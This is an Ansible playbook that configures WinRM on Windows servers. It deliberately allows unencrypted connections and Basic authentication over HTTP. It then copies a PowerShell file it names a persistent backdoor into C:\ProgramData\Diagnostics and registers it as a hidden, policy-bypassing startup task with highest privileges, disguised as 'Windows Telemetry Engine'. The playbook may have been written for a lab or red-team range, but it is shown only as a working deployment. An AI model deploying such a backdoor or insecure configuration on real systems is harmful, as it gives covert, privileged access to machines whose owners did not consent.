---
- name: Configure WinRM on Windows Server
  hosts: winrm
  tasks:
    - name: Enable WinRM
      win_feature:
        name: "WinRM-IIS-Ext"
        state: present

    - name: Set up completely insecure WinRM configuration
      win_shell: |
        winrm quickconfig -quiet
        winrm set winrm/config/service '@{AllowUnencrypted="true"}'
        winrm set winrm/config/service/auth '@{Basic="true"}'
        winrm set winrm/config/listener?Address=*+Transport=HTTP '@{Port="5985"}'

    - name: Verify WinRM connectivity
      win_ping:
      
    - name: Make Directory
      win_file:
        path: C:\ProgramData\Diagnostics
        state: directory

    - name: Copy persistent PowerShell backdoor to WinRM target
      win_copy:
        src: services/winrm/backdoor/boot.ps1
        dest: C:\ProgramData\Diagnostics\boot.ps1

    - name: Register backdoor as a startup scheduled task
      win_shell: |
        $action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden -ExecutionPolicy Bypass -File C:\ProgramData\Diagnostics\boot.ps1"
        $trigger = New-ScheduledTaskTrigger -AtStartup
        Register-ScheduledTask -TaskName "Windows Telemetry Engine" -Action $action -Trigger $trigger -RunLevel Highest -Force
